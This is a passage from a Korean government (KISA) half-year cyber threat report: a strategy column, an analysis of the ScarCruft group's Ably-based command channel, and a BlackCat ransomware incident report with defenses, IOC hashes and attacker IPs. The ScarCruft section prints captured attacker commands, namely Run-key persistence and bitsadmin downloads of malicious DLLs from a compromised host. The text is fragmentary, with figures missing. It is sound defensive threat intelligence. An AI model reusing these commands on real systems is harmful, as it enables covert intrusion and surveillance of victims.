여전히 위험에 처해 있다고 가정하라 특히 국가가 지원하는 사이버 공격을 완전히 저지할 수 없을 수
있지만, 적이 악용할 가능성이 있는 "문과 창문"(취약점)을 식별하고 이를 수정하며, 파트너에게 동일한
작업이 이행되도록 집단적으로 움직일 필요가 있다.
9) https://en.wikipedia.org/wiki/Petya_and_NotPetya
10) https://en.wikipedia.org/wiki/Colonial_Pipeline_ransomware_attack
11) https://www.nationalisacs.org/
60
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
3. 미국 공공 사이버보안 기술 개발 방향
019년 12월, 백악관 과학기술정책실(OSTP)은 국가 최상위 사이버보안 연구개발 4개년 전략계획12) 보고서를
2
발표하였다. 기존 ’16년에 발표된 전략계획 13)을 새롭게 개편하고, ’18년에 제시한 국가 최상위 사이버
전략(National Cyber Strategy of the United States of America)을 반영하여 5대 전략을 제시하였다.
사이버보안 내 인간 역할 증진
효율적 사이버보안 관련 위험 관리
eter, Protect, Detect 및 Respond의 사이버 보안 프레임은 전체 범위의 사이버 보안 요구사항을 반영하고
D
R&D를 조정하여 공동 목표에 달성하기 위한 구조를 제공하게 된다. 각 구성 요소는 다음과 같이 정의된다.
억지(Deter) 잠재적인 적에 대한 비용을 늘리고 피해를 줄이며 위험과 불확실성을 증가시켜 악의적인
사이버 활동을 억지할 수 있는 능력
12) https://www.nitrd.gov/pubs/Federal-Cybersecurity-RD-Strategic-Plan-2019.pdf
13) 사이버보안 국가 행동계획(CNAP: Cybersecurity National Action Plan)
61
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
보호(Protect) 악의적인 사이버 행동에 효율적으로 저항하고 기밀성, 무결성, 가용성 및 책임을 보장하는
구성 요소, 시스템, 사용자 및 주요 인프라의 보안 기능
감지(Detect) 완벽한 보안이 불가능하고 시스템이 악의적인 행동에 취약한 것으로 가정한 상태에서 적의
결정과 활동을 효율적으로 감지하고 예측할 수 있는 능력
대응(Respond) 공격에 효율적으로 적응하고, 악의적인 활동에 대응하고, 피해로부터 복구하고, 복원을
완료하는 동안 정상 운영을 유지하며, 유사한 미래 활동을 저지하기 위해 조정함으로써 악의적인 사이버
활동에 동적으로 대응하는 방어자, 방어 및 인프라의 능력
’18년 미국 사이버 전략의 우선순위 목표와 정부 2021년 R&D예산 우선순위를 반영하여, 다음과 같이 6대
중점분야에서 각각 사이버 보안 구성 요소와 도전과제를 제시하였다.
인
공지능(Artificial Intelligence) 4대 사이버보안 구성요소에 모두 영향을 미치는 주제로써, 인공지능 시스템의
빠른 속도 및 규모에 대한 운영 개선, 인공지능시스템 해석 가능성 향상, 인공지능 시스템 구성요소 취약성
보완 및 효율성 평가 방법
프라이버시(Privacy) 보호 요소에 해당하는 주제로써. 프라이버시 보호 시스템 개발의 어려움 극복, 사생활
보호 시스템 개발 도구의 부재, 사생활 침해로부터 효과적인 회복 방안 마련
시큐어 하드웨어·소프트웨어(Secure HW & SW) 보호, 감지 요소에 해당하는 주제로써. 안전한 하드웨어
공급망 구축, 악의적 하드·소프트웨어 소유 예방, 하드웨어 취약성 보완, 소프트웨어 정기적 업데이트,
효과적 소프트웨어 관리 등
62
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
국, EU 등 주요국 들의 사이버 전략이 보호 대상을 방어하는 수동적 방어보다 선제적으로 대응하겠다는 공통된
미
방향성을 보임에 따라 한국도 기술 개발 방향을 새로운 패러다임으로 집중하려고 하고 있다.
(능동적 방어) 사이버공격으로 인한 피해가 발생하기 전 또는 피해가 확대되기 전에 공격자의 의도를 미리
분석하여 이에 대한 조치를 사전에 수행하는 적극적 사이버 방어
① 사이버공격 억지력 확보
•사이버공간 취약점 관리 (소프트웨어 취약점 식별 등)
•사이버공격 원인 분석 기술 확보 (신종 사이버 공격 분석, 보안위협 자동분석 등)
•사이버공격 억지를 위한 배후 규명 (사이버공격 원인 분석, 공격원점 규명 등)
② 대규모 공격 대비태세 강화
•사이버 위기상황 판단 및 합동조사·대응체계 (침해대응 협의회, 위협지수 개발 등)
•지능정보기술 기반 사이버공격 탐지술 (공격 형태분석, 취약점 자동분석/패치 등)
•범국가적 사이버위기 대응능력 제고 (민·관·군 사이버공격 대응훈련 등)
③ 포괄적ㆍ능동적 수단 강구
•사이버위협 포괄적·능동적 대응 (우방국, 국제 안보기구 등과 협조체계 구축 등)
•사이버전 대비 전략·전술, 사이버 전력체계 보강(포괄적·능동적 사이버작전 등)
•사이버전 수행 인력 정예화 (사이버전술 훈련장 구축 등)
④ 사이버범죄 대응역량 제고
•사이버범죄 관리강화, 사회안전망 구축 (사이버안전 모니터링, 민·관 협조체계 구축 등)
•사이버범죄 대응 수사·기소 역량 제고 (증거확보 및 공격자 식별, 수사 역량 등)
63
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
64
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
분야 전략기술 개 념
사이버공격 미래 사이버공격에 효율적인 대응을 위해 능동적 예방 보안 전략으로 전환하여
기만(우회) 기술 공격자의 비용을 극대화시키고, 공격 목표에 달성하기 어렵게 만드는 기술
전략적 사이버보안 인적
국가 사이버보안 인력 경쟁력 강화를 위한 훈련기술 등 인적자원 관리·개발 기술
자원 개발 및 관리기술
기타 기술 이 외, 국가 사이버위협에 대한 능동 대응을 위한 기타 기술
65
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
결 언
번 동향 분석으로 Defend Forward의 의미와 핵심 요소를 충분히 이해할 수 있으나 이 전략 개념을 기술적으로
금
완성시키고 실제 환경에서 구현, 구축 및 운용하는 것은 보다 많은 준비와 노력이 필요해 보인다.
66
2023년 상반기
사이버 위협 동향
보고서
Part. 3
Techniques┃ 기술 보고서
3-1. K
ISA 침해사고분석단 종합분석팀
김동욱 선임, 이태우 선임, 이슬기 선임 :
TTPs $ ScarCruft Tracking Note
3-2. K
ISA 침해사고분석단 사고분석팀_신우성 선임,
플레인비트_이예나 선임, 이상아 연구원, 한택승 연구원 :
블랙캣 랜섬웨어 침해사고 기술보고서
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
Part. 3
Abstract
공격 조직
본 보고서에서 분석한 조직은 최소 2012년부터 국내를 대상으로 공격 활동을 펼치고 있습니다. 공격 조직의 이름은
각 보안업체들마다 명명한 여러 가지 이름으로 불리고 있으며 대표적인 이름은 아래와 같습니다. 본 보고서에서는
Kaspersky로부터 공유 받은 샘플로부터 추적을 시작하였기 때문에 ScarCruft라는 이름을 차용하여 설명합니다.
AKA Named By
ScarCruft Kaspersky
APT37 Mandiant
금성121 ESTsecurity
공격 조직의 타겟과 목적
ScarCruft 그룹은 국가기반 해킹 조직으로, 국가의 체제 유지를 위해 공격을 수행하는 것으로 보입니다. 체제를
이탈한 주민, 해외 파견 근로자, 기자 및 선교사를 주 공격 대상으로 삼고 있습니다. 뿐만 아니라 공격 조직이 속한
국가와 관련된 국내 주요 인사들도 공격 대상입니다. 공격 대상에 대해 해킹에 성공하면 대상의 휴대전화 기록,
데스크톱 기록, 메신저 채팅 기록 등을 탈취합니다. 침해한 시스템을 파괴하거나 탈취한 정보로 협박하는 등의
행위를 하지 않는 것으로 보아 감시 목적이 강한 것으로 추정됩니다.
68
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
주요 침투방식
목표 대상이 관심을 가질 만한 내용으로 스피어피싱 이메일을 송부하여 악성코드를 다운로드 받도록 유도하는
방식을 많이 사용합니다. 또한 메신저 채널에 위장 잠입하여 악성앱 설치를 유도하기도 합니다.
본 보고서의 핵심 내용
한국인터넷진흥원은 기존 발표한 보고서(TTPs #9 개인의 일상을 감시하는 공격전략 분석) 이후 지속적인 추적을
통해 ScarCruft 공격조직이 새로이 사용한 신규 명령제어 채널을 발견했습니다. 우리는 신규 명령채널을 모니터링
할 수 있는 도구를 직접 개발 제작해 작년 10월 중순부터 약 2개월간 공격자의 명령제어 과정을 24시간 추적하고
모니터링 하는 활동을 수행했습니다. 그 결과, 해당 조직의 타겟으로 확인된 감염자를 확인해, 피해가 확산되지
않도록 조치했습니다. 공격자는 타겟을 감시하기 위해 Chinotto 악성코드를 적극적으로 활용하며 VNC 설치,
정보유출 등의 활동을 하는 것으로 확인했습니다. 그리고 공격대상의 환경과 공격목적에 맞게 명령제어 체계를
재정비하는 정황도 확인했습니다.
KrCert/CC는 지속적인 추적 활동을 통해 공격자의 변화된 TTP를 확인하고 이것을 알림으로써 방어자들에게 각자의
방어 환경에 맞는 전략을 수립하는데 도움을 줄 것입니다. 또한 단순히 공격자의 행위를 추적하고 TTPs를 파악하는
활동을 넘어 피해사실 인지 즉시 조치해 민간 기업과 개인의 위협을 제거하고 억지하기 위해 끊임없이 노력하고
있습니다.
1. Introduction
2022년 연말 공개한 TTPs #9 개인의 일상을 감시하는 공격전략 분석을 통해, 고도화된 정보수집 활동과 공격 기법,
전술, 그리고 절차에 대하여 공유했습니다. 본 문서에서는 보고서 게시 시점에 공개하지 않았던 Go 언어 기반의
새로운 명령제어 기법에 대해 설명하고, 악성코드에 내재된 API 키를 활용해 공격자의 행위를 모니터링 한 결과를
공유합니다.
69
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
공격자는 공격을 수행하고 지속하기 위해 TTP 중 일부를 지속적으로 변화하며 공격을 수행하고 있습니다. 우리는
위협을 추적 및 제거하고 분석하는 과정에서 기술(Techniques)의 변화를 확인했습니다. 기존 공격 과정에서는
명령제어를 위해 스크립트 기반의 명령제어를 활용했으나, 현재 Golang 기반 명령제어 체계를 구축해 더욱 더
은밀하게 명령제어를 수행하고 있음을 확인했습니다.
우리는 이번 보고서를 통해 ScarCruft 그룹의 신규 악성코드인 Go언어 기반 원격제어기를 이용한 명령제어 과정과
침투 이후 공격자의 행위(Procedures)에 대해 상세히 이야기합니다.
기존 공격 시나리오
최신 공격 시나리오
70
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
3.1. Ably란?
가. External Remote Services
Ably는 실시간으로 데이터를 송수신해, 통계정보를 제공하거나 휴대폰 알림 서비스 등으로 활용할 수 있는 서비스
입니다. Ably 서비스를 이용하면, 서버의 메일과 스마트워치의 생체정보도 저장하고 이를 실시간으로 연동해
데이터를 공유할 수 있기 때문에 유연한 정보 송수신이 가능합니다. 공격자는 Ably 서비스를 악용해, Go 언어
악성코드에 명령제어 기능을 새로이 구현했습니다.
Ably(https://ably.com)[2]
71
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
이 명령체계의 장점 중 첫 번째는 차단이 불가능하다는 점입니다. 우리는 정상적인 서비스인 Ably를 차단할 수
없기 때문입니다. 두 번째는 공격자의 IP 노출이 최소화된다는 점입니다. Ably 내부에 로그가 존재할 수는 있지만,
서비스 이용자에게 접속 로그를 제공하는 기능은 존재하지 않습니다. 그리고 세 번째는 외부 서비스를 사용하기
때문에 어디에서나 명령제어가 가능하다는 점입니다. 위와 같이, 공격자는 Ably 서비스의 장점을 그대로 활용할 수
있습니다.
72
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
중요한 명령을 하달할 때는 ScarCruft의 대표적인 원격제어 도구인 Chinotto 악성코드뿐 아니라 다른 환경에서 동작
가능한 원격제어 도구를 개발/운용하는 것으로 추정됩니다.
73
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
4. Discussion
우리는 선제적으로 대응을 하는 Defend Forward 관점에서 3.2에서 확인할 수 있었던 Ably 서비스의 API 키를
활용, 공격자의 명령제어 채널을 모니터링할 수 있었습니다. 특히, 악성코드를 단순 실행하게 되면 분석환경
정보가 공격자에게 송신되기 때문에, Go 언어를 기반으로 모니터링 스크립트를 직접 개발, 운영했습니다. 그 결과
ScarCruft의 명령제어 데이터를 확보, 추가적으로 데이터를 분석할 수 있었습니다.
4.2 Monitoring
ScarCruft의 명령제어를 모니터링하는 중 다양한 유형의 명령제어 악성코드를 확인 가능했으며, 과거부터 활용되어
온 명령제어 악성코드와 Golang으로 제작된 신규 서비스(Ably) 기반 악성코드까지 활용한 것을 발견했습니다.
이것은 메인 명령제어 체계의 수단이 비정상적으로 동작할 경우 대체하기 위한 면도 있겠지만, 잠재적 공격대상들이
보유한 환경이 다양하기 때문에 그에 따라 공격도구를 다변화하여 사용하는 것으로 추정됩니다.
74
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
아래는 감염자가 최초로 감염된 이후에 공격자가 어떻게 명령을 내렸는지 확인할 수 있는 실제 데이터입니다.
75
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
76
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
77
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
78
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
아래 근거를 종합해 판단했을 때, ScarCruft의 조직원들에게는 공격을 수행하기 위한 매뉴얼과 스크립트 생성기가
존재하고, 일부 변수에 대하여 사람이 직접 수정, 공격하는 것으로 추정됩니다.
근거 1 mm vs. mmm
공격자는 bitsadmin을 이용해서 악성코드를 다운로드 하는데 bitsadmin 명령어의 작업명칭을 지정할 때 mm과
mmm을 사용했습니다. 따라서, 모든 명령어를 사람이 작성한다기 보다 매뉴얼에서 명령어를 복사 후 URL과
작업명만 사람이 수정해 활용한다고 추정할 수 있습니다.
79
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
근거 3 공격자의 실수
•MyVNC 악성코드 실행
MyVNC 악성코드를 실행시키는 과정에서 공격자는 명령제어가 정상적으로 연결되지 않은 문제점을 인지하게
되었습니다. 그 원인은 공격자가 새로운 경로(c:\users\public\myvnc\)로 msinfo32를 복사하지 않았기
때문입니다. 이에 대하여 forfiles 명령어를 통해 확인한 공격자는 장애 원인을 제거하고 MyVNC 악성코드를
실행할 수 있었습니다.
# 4.2. Monitoring 예제 중 발췌
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msinfo64 /d “c:\
users\public\myvnc\msinfo32.exe” /f
mkdir c:\users\public\myvnc
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/
mfc42u-myvnc-win10.dll c:\users\public\myvnc\mfc42u.dll
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/
myvnc.dll c:\users\public\myvnc\evc.dll
c:\users\public\myvnc\msinfo32.exe
c:\users\public\myvnc\msinfo32.exe
whoami
forfiles /p c:\users\public\myvnc
copy c:\windows\syswow64\msinfo32.exe c:\users\public\myvnc\msinfo32.exe
c:\users\public\myvnc\msinfo32.exe
80
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
•드라이브(C, D) 정보 유출
공격자는 디렉터리(하위 포함) 내 파일정보를 저장할 때 각 드라이브의 이름을 이용하여 파일명을 작성합니다.
다만, C 드라이브 정보를 dirs-d.ini에 저장했기 때문에 불필요하게 명령을 다시 수행할 수밖에 없었습니다.
그 외에도 파워셸 스크립트를 이용해 명령제어지로 해당 파일을 업로드하게 되는데, 공격자는 dir-c.ini와 dir-
d.ini를 업로드 하도록 명령했기 때문에, 정보유출은 실패했을 것입니다.(올바른 파일명은 dirs-c.ini, dirs-
d.ini입니다)
References
2. Ably
81
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
Part. 3
1. Introduction
82
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
2. Summary
•(최초침투) VPN 계정 탈취 후 내부 침투
•(정보수집) 공격도구를 통해 계정 및 서버 정보 수집
83
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
3. ATT&CK Matrix
(중간생략)
84
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
85
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
파워셸을 통해 추가 파일 다운로드(이벤트로그)
Type : Information
Date :
Time :
Event : 600
Source : PowerShell
Category : 공급자 수명 주기
User : N/A
Computer : [)
Description:
“Alias” 공급자가 Started입니다.
세부 정보:
ProviderName=Alias
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=4.0
HostId=f97081ad-4cf3-4a8d-82c9-f2154a9975e1
HostApplication=powershell.exe -executionpolicy remotesigned -File .\\Get-
DataInfo.ps1 method
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
86
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
도구명 도구 설명
ScreenConnect.exe 원격 접근 프로그램
winscp.exe 원격 접속 악성코드
공격자가 사용하는 세션 정보 도구
도구명 도구 설명
putty.reg 접속 관련 registry 변경 파일
Type : Information
Date :
Time :
Event : 106
Source : Microsoft-Windows-TaskScheduler
Category : 등록된 작업
User : \SYSTEM
Computer :
Description:
“NT AUTHORITY\System” 사용자가 작업 스케줄러 작업 “\wow64”을(를) 등록했습니다.
87
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
작업 스케줄러 설정파일(wow64)
작업 스케줄러 설정파일(wow64)
88
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
공격자가 사용하는 백신 제거 및 종료 도구
도구명 도구 설명
del.bat 백신 셧다운 스크립트
Backstab.exe 백신 강제 종료 도구
도구명 도구 설명
mimikatz.exe 계정 정보 수집 도구
89
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
계정 정보 수집 도구(mimikatz.exe) 실행 이력 (UserAssist)
도구명 도구 설명
net64.exe 네트워크 주소, 숨겨진 공유폴더 확인, 원격 접근 기능 제공
netscan.exe 네트워크 스캔 도구
netscan.exe 네트워크 스캔 도구
•net64.exe
90
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
91
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
92
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
공격자가 사용하는 악성 도구
도구명 도구 설명
ProcessHacker.exe 시스템 프로세스를 관리하기 위한 유틸리티 도구
•ProcessHacker.exe
93
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
도구명 도구 설명
•PsExec.exe
94
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
•zagent.exe
랜섬웨어
도구명 도구 설명
[회사명].exe windows 환경에서의 실행파일
95
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
랜섬웨어 실행 흔적 (Appcompatcache)
ㅣ What happened?
Important files on your network was ENCRYPTED and now they have “v*****n”
extension. In order to recover your files you need to follow instructions
below.
ㅣ Sensitive Data
Sensitive data on your network was DOWNLOADED.
If you DON’T WANT your sensitive data to be PUBLISHED you have to act
quickly.
Data includes:
- Employees personal data, CVs, DL, SSN.
- Complete network map including credentials for local and remote services.
- Private financial information including: clients data, bills, budgets,
annual reports, bank statements.
- Manufacturing documents including: datagrams, schemas, drawings in
solidworks format
- And more...
96
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
나. Shutdown / Reboot
랜섬웨어 감염을 위해 가상서버 일괄 종료한다. 추가적으로 랜섬웨어 감염 시키고 서버를 재부팅한다.
ATT&CK Matrix
Tatic ID Sub-techniques Description
Remote Services :
Lateral Movement T1021.001 원격 데스크톱(RDP)을 통해 원격 접속
Remote Desktop Protocol
악성 파일 사용하여 공유 폴더통한
Lateral Movement T1570 Lateral Tool Transfer
원격 접근
97
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
4. Defense
VPN 계정 보안
VPN 계정의 패스워드는 주기적 변경과 복잡성(영/대소문자, 숫자, 특수문자 혼합 10자리 이상 권장)을 만족하도록
정책적 설정이 필요하다. 또한 VPN 접속시, 소유(또는 생체 기반 2차 인증(문자메시지, 모바일 앱 등)을 적용하는
것을 권장한다. 추가적으로 퇴사자 및 미사용 계정은 바로 삭제하여 관리해야한다.
VPN 접근제어 강화
비허가된 외부 접근 차단을 위해 VPN 접속 허용 IP를 화이트리스트 방식으로 접근 제어 설정하고 해외 접속이
필요한 계정 외의 계정에서 VPN 사용이 불가하도록 설정하는 것을 권장한다.
4.2 랜섬웨어 대응
랜섬웨어 차단 기능 활성화
각종 백신 프로그램은 랜섬웨어 방지 기능을 제공한다. ‘제어된 폴더 액세스’, ‘파일 위변조 탐지’, ‘랜섬웨어 데이터
복구’ 등 일부 유/무료 서비스들을 활성화하여 랜섬웨어로부터 보호할 수 있다.
랜섬웨어 대응 가이드 라인 확인
한국인터넷진흥원은 랜섬웨어 감염 시 이에 대응하기 위한 목적으로 랜섬웨어 대응 가이드라인을 제공하고 있다.
가이드라인에서는 랜섬웨어 예방을 위한 보안 수칙이나 랜섬웨어 대응과 관련된 요청 등의 내용이 포함되어있다.
다운로드 방법
www.boho.or.kr → 자료실 → 가이드 및 매뉴얼 ’랜섬웨어 대응 가이드’, ‘안전한 정보시스템 백업 가이드’
98
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
중요 자료 정기 백업
시스템 내 중요 파일이 백업되어 있지 않을 경우 피해 규모가 커질 수 있다. 중요 파일을 네트워크로 연결된 다른
서버로 백업할 경우 랜섬웨어 감염 시 백업 서버 또한 감염될 수 있다.
Active Directory 환경 보안 정책 점검
다수의 전산 자원 관리를 위해 사용되는 AD(Active Directry)는 도메인에 가입되어 있는 단말기나 서버의 일률적
제어가 가능하기 때문에 침해사고 발생 시 피해 규모가 커질 수 있다. AD 환경에서의 기본 보안 강화는 아래와
같다.
망 분리 인프라 환경 구성 권고
공격자는 취약한 호스트 PC, 서버를 감염시키며, 감염된 호스트들은 다른 호스트 PC들을 찾아서 공격한다.
악성코드에 감염된 서버와 동일한 네트워크 대역에 속해 있는 서버는 2차 공격 및 감염에 취약할 수 있다. 때문에,
사내 시스템 업무 유형들을 파악하여 업무에 맞는 네트워크 망을 구성하여 체계적으로 관리 및 운영해야 한다.
99
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
원격 데스크톱 접근 보안 강화
공격자는 원격 데스크톱 프로토콜을 이용하여 피해 시스템에 접근할 수 있다. 공격자가 원격으로 서버에 접근할
경우 일반 사용자처럼 작업을 수행할 수 있다. 따라서 인가된 사용자만 접근이 가능하도록 화이트리스트 정책을
권고한다. 또한, 원격 데스크톱 접근 시 OTP와 같은 다중 인증 방식(MFA, Multi-Factor Authentication)을 통해
서버에 접속할 수 있도록 제한하는 것을 권고한다.
로컬 관리자 계정 정보 변경
피해 시스템에 지속적인 접근 유지를 위해 백도어 계정을 생성한다. 윈도우 서버의 경우 ‘Administrator’가 기본
관리자 계정으로 생성된다. 관리가 계정 이름을 변경하거나 비활성화하여 공격자로부터 관리자 계정 접근을
제한해야 한다. 또한, 비밀번호 정책은 공격자가 유추하기 어려운 특수문자, 대/소문자, 숫자 조합으로 10자리
이상을 권고한다.
4.4 잠재적 위협 요소 제거
악성 파일 삭제 또는 운영체제 재설치 후 사용
공격자가 사용한 공격 도구가 서버 내에 존재할 경우, 동일한 공격자에 의해 추가 공격이 수행될 가능성이 높다.
공격자가 추후 공격을 위해 남겨둔 파일, 프로세스, 서비스 등 위협 요소를 제거하여 공격자의 추가 공격을 차단한다.
혹은 운영체제를 재설치 하는 것도 위협을 제거하는 하나의 방법이 될 수 있으므로 최신 운영체제 설치하여
취약점에 대비하는 것을 권고한다.
한국인터넷진흥원은 개인/기업 보안에 도움이 될 수 있다. 중소기업 대상으로 현재 ‘중소기업 침해사고 피해지원
서비스’를 제공 중이다. 더불어 각종 보안 보고서, 대응 가이드를 제공하고 있으며 보안 관련 중요한 이슈 발생 시
홈페이지 내 보안공지를 통해서 공유하고 있다. 자세한 내용은 아래 한국인터넷진흥원 인터넷 보호나라에서 확인할
수 있다.
한국인터넷진흥원 보안공지
•보안 관련 주요 이슈 발생 시 한국인터넷진흥원에서 관련 내용을 공지하고 있다.
100
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
한국인터넷진흥원 배포 가이드/보고서
•한국인터넷진흥원에서 발간하는 각종 보안 가이드와 공격그룹 분석 보고서를 제공하고 있다.
중소기업 대상 보안서비스
•중소기업을 대상으로 한국인터넷진흥원에서 제공하는 보안서비스이며, 이번 샤오치잉 공격 관련으로는 내 서버
돌보미, 중소기업 홈페이지 보안강화 보안서비스를 권장한다.
[기업 서비스 홈 > 기업 서비스 > 주요사업 소개 > 정보보호 서비스 : KISA 인터넷 보호나라&KrCERT]
[사이버 위기대응 모의훈련 > 기업 서비스 > 주요사업 소개 > 정보보호 서비스 : KISA 인터넷 보호나라&KrCERT]
101
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
5. Conclusion
Appendix
악성파일(웹셸)
MD5 Hash
88A630E0633045159CE0C0ACC01BD5F4
ACE2AEF7F6F03233AC9836977A82A276
E458DB1C3C1359A12A3D4C952022CB71
67EBA714F23EE4B7C9CAF7136CB983DB
0FBD87B813516942F0391D783F4F70F2
4C3866023B50AA90A7BAA30A49A7C06C
102
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
공격자 IP
IP 조회는 KISA WHOIS OpenAPI 활용
IP 국가코드(국가명)
8.213.132.75 SG(싱가포르)
5.28.34.201 KH(캄보디아)
36.227.231.17 TW(대만)
114.43.86.96 TW(대만)
203.69.23.25 TW(대만)
114.43.86.96 TW(대만)
142.202.49.101 US(미국)
106.55.207.123 CN(중국)
218.190.235.118 HK(홍콩)
218.190.235.135 HK(홍콩)
114.246.35.136 CN(중국)
111.202.167.85 CN(중국)
114.255.249.182 CN(중국)
114.247.113.166 CN(중국)
103.142.65.131 IN(인도)
103.142.65.141 IN(인도)
156.251.145.233 SC(세이셸)
163.47.15.102 KH(캄보디아)
104.28.211.105 US(미국)
114.43.88.126 TW(대만)
203.69.23.25 TW(대만)
114.25.103.20 TW(대만)
192.109.205.229 US(미국)
192.109.205.229 US(미국)
192.109.205.179 US(미국)
103
2023년 상반기
사이버
위협 동향
보고서
세종특별자치시 갈매로 477, 정부세종청사 4동 3층~6층 [나주본원] 전라남도 나주시 진흥길 9 한국인터넷진흥원
대표번호. 국번없이 (무료)1335 (정부민원 110) [서울청사] 서울시 송파구 중대로 135 (가락동) IT벤처타워
대표번호. 1433-25(수신자 요금 부담)